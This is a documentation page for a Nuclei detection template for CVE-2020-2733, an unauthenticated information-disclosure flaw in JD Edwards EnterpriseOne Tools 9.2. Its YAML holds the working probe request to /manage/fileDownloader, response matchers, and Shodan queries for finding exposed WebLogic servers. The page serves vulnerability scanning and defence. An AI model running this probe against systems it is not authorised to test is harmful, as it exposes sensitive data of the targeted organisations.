Skip to content
Nuclei Templates

JD Edwards EnterpriseOne Tools 9.2 - Information Disclosure

ID: CVE-2020-2733

Severity: critical

Author: DhiyaneshDk,pussycat0x

Tags: cve2020,cve,oracle,weblogic,disclosure,exposure

Description

Section titled “Description”

JD Edwards EnterpriseOne Tools 9.2 is susceptible to information disclosure via the Monitoring and Diagnostics component. An attacker with network access via HTTP can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

YAML Source

Section titled “YAML Source”
id: CVE-2020-2733


info:
  name: JD Edwards EnterpriseOne Tools 9.2 - Information Disclosure
  author: DhiyaneshDk,pussycat0x
  severity: critical
  description: |
    JD Edwards EnterpriseOne Tools 9.2 is susceptible to information disclosure via the Monitoring and Diagnostics component. An attacker with network access via HTTP can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
  reference:
    - https://redrays.io/cve-2020-2733-jd-edwards/
    - https://www.oracle.com/security-alerts/cpuapr2020.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-2733
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-2733
    epss-score: 0.19944
    epss-percentile: 0.96328
    cpe: cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: oracle
    product: jd_edwards_enterpriseone_tools
    shodan-query:
      - port:8999 product:"Oracle WebLogic Server"
      - port:8999 product:"oracle weblogic server"
  tags: cve2020,cve,oracle,weblogic,disclosure,exposure


http:
  - method: GET
    path:
      - '{{BaseURL}}/manage/fileDownloader?sec=1'


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'ACHCJK'


      - type: word
        part: header
        words:
          - "text/plain"


      - type: status
        status:
          - 200
# digest: 4a0a004730450221009a4c5390fadd5418b17194521d5f699cb43cb43ea39fe6e2d21ccfad088d83d70220573e74e2bf11104487334d71ff79d36ba47546b5a44df2bee8b2188dbf8929ee:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-2733.yaml"

View on Github